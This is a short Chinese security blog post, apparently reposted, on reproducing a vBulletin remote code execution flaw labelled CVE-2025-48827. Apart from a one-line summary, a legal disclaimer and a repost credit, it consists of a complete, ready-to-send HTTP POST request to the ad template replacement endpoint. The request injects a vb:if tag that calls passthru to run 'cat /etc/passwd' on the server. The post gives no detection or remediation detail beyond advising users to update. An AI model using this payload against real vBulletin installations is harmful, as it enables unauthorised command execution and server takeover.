文章总结： 文档详述了vBulletin远程代码执行漏洞CVE-2025-48827的复现方式。该漏洞存在于广告模板替换接口，攻击者通过构造特殊的POST请求并在template参数中嵌入恶意的vb:if标签，可调用passthru函数执行任意系统命令。建议受影响用户及时更新修复并加强输入过滤。 综合评分： 72 文章分类： 渗透测试,漏洞分析,WEB安全

vBulletin远程代码执行漏洞复现（CVE-2025-48827）

安全艺术 安全艺术

安全艺术

2026年1月24日 11:25 北京

POST /ajax/api/ad/replaceAdTemplate HTTP/2
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 142

routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=rce8&template=<vb%3aif+condition%3d'"passthru"("cat+/etc/passwd")'></vb%3aif>

新圈子dddd和知识库

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术 安全艺术 安全艺术《vBulletin远程代码执行漏洞复现（CVE-2025-48827）》